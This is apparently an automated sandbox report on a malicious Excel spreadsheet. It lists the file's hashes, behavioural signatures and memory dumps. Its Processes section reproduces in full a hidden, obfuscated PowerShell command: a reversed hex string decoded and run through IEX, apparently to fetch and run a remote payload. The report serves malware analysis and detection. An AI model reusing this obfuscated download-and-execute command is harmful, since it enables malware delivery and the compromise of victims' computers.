Analysis

  • max time kernel
    67s
  • max time network
    16s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/03/2025, 06:26

General

  • Target
    96bf0039c8086e96b175fc8c5d09bd6ebb70c40a7f3a00293eebe287da4ecc8c.xls
  • Size
    440KB
  • MD5
    06278f61fb1e92e3f197930234fa6eb8
  • SHA1
    34b83031b8bcbfeb820fa65a09f6e480a4f430b0
  • SHA256
    96bf0039c8086e96b175fc8c5d09bd6ebb70c40a7f3a00293eebe287da4ecc8c
  • SHA512
    ffaa4f467e3b1669ad589342cede512cedd727c78ea70fe366c2b42482260db0dd54bce99471fb52c422f7795c3b7361e7ce5b754b6507debbaf1d6625120556
  • SSDEEP
    6144:Qk3hOdsylKlgxopeiBNhZF+E+W2kdAsoCbk1cVVXVKJKYWX36lvpxtZcEfz0/B9D:FhZh3cpFL0/WuYzqD0VlU9Z

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Drops file in System32 directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\96bf0039c8086e96b175fc8c5d09bd6ebb70c40a7f3a00293eebe287da4ecc8c.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2372
  • C:\Windows\system32\CMD.exe
    CMD /c start /min Powershell -WindowStyle hidden -command "$gh47gh7='92^72^37^26^67^E2^C6^C6^16^77^56^27^96^66^C5^72^02^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^82^37^37^56^36^F6^27^07^D2^47^27^16^47^37^B3^85^06^54^06^94^C7^72^92^72^72^37^26^67^E2^C6^C6^16^77^56^27^96^66^C5^72^72^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^C2^72^72^37^26^67^E2^96^46^56^F2^47^96^D6^56^27^F2^76^F6^C6^F2^D6^F6^36^E2^27^96^16^47^37^57^76^57^16^F2^F2^A3^07^47^47^86^72^72^82^56^72^B2^72^C6^96^72^B2^72^64^72^B2^72^46^72^B2^72^16^F6^72^B2^72^C6^E6^72^B2^72^77^F6^72^B2^72^44^E2^72^B2^72^92^47^E6^56^72^B2^72^96^C6^72^B2^72^34^72^B2^72^26^56^72^B2^72^75^72^B2^72^E2^47^72^B2^72^56^E4^72^02^B2^72^02^47^36^72^B2^72^56^A6^72^B2^72^26^F4^72^B2^72^D2^77^72^B2^72^56^E4^82^72';$r7gf0eee = $gh47gh7.ToCharArray();[Array]::Reverse($r7gf0eee);$uy4wer0=-join $r7gf0eee;$y45jkh0dfg=$uy4wer0.Split('^') | forEach {[char]([convert]::toint16($_,16))};$y45jkh0dfg -join ''|I`E`X"
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:2596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Powershell -WindowStyle hidden -command "$gh47gh7='92^72^37^26^67^E2^C6^C6^16^77^56^27^96^66^C5^72^02^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^82^37^37^56^36^F6^27^07^D2^47^27^16^47^37^B3^85^06^54^06^94^C7^72^92^72^72^37^26^67^E2^C6^C6^16^77^56^27^96^66^C5^72^72^B2^14^45^14^44^05^05^14^A3^67^E6^56^42^C2^72^72^37^26^67^E2^96^46^56^F2^47^96^D6^56^27^F2^76^F6^C6^F2^D6^F6^36^E2^27^96^16^47^37^57^76^57^16^F2^F2^A3^07^47^47^86^72^72^82^56^72^B2^72^C6^96^72^B2^72^64^72^B2^72^46^72^B2^72^16^F6^72^B2^72^C6^E6^72^B2^72^77^F6^72^B2^72^44^E2^72^B2^72^92^47^E6^56^72^B2^72^96^C6^72^B2^72^34^72^B2^72^26^56^72^B2^72^75^72^B2^72^E2^47^72^B2^72^56^E4^72^02^B2^72^02^47^36^72^B2^72^56^A6^72^B2^72^26^F4^72^B2^72^D2^77^72^B2^72^56^E4^82^72';$r7gf0eee = $gh47gh7.ToCharArray();[Array]::Reverse($r7gf0eee);$uy4wer0=-join $r7gf0eee;$y45jkh0dfg=$uy4wer0.Split('^') | forEach {[char]([convert]::toint16($_,16))};$y45jkh0dfg -join ''|I`E`X"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1512

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/1512-29-0x000000001B670000-0x000000001B952000-memory.dmp (Filesize: 2.9MB)
  • memory/1512-30-0x0000000001E80000-0x0000000001E88000-memory.dmp (Filesize: 32KB)
  • memory/2372-23-0x00000000007E0000-0x00000000008E0000-memory.dmp (Filesize: 1024KB)
  • memory/2372-22-0x0000000006B50000-0x0000000006C50000-memory.dmp (Filesize: 1024KB)
  • memory/2372-16-0x0000000006B50000-0x0000000006C50000-memory.dmp (Filesize: 1024KB)
  • memory/2372-12-0x00000000007E0000-0x00000000008E0000-memory.dmp (Filesize: 1024KB)
  • memory/2372-21-0x00000000007E0000-0x00000000008E0000-memory.dmp (Filesize: 1024KB)
  • memory/2372-24-0x0000000006B50000-0x0000000006C50000-memory.dmp (Filesize: 1024KB)
  • memory/2372-1-0x00000000723BD000-0x00000000723C8000-memory.dmp (Filesize: 44KB)
  • memory/2372-17-0x0000000006B50000-0x0000000006C50000-memory.dmp (Filesize: 1024KB)
  • memory/2372-4-0x0000000006B50000-0x0000000006C50000-memory.dmp (Filesize: 1024KB)
  • memory/2372-0-0x000000005FFF0000-0x0000000060000000-memory.dmp (Filesize: 64KB)
  • memory/2372-31-0x00000000723BD000-0x00000000723C8000-memory.dmp (Filesize: 44KB)
  • memory/2372-32-0x0000000006B50000-0x0000000006C50000-memory.dmp (Filesize: 1024KB)
  • memory/2372-33-0x0000000006D50000-0x0000000006E50000-memory.dmp (Filesize: 1024KB)
  • memory/2372-34-0x00000000007E0000-0x00000000008E0000-memory.dmp (Filesize: 1024KB)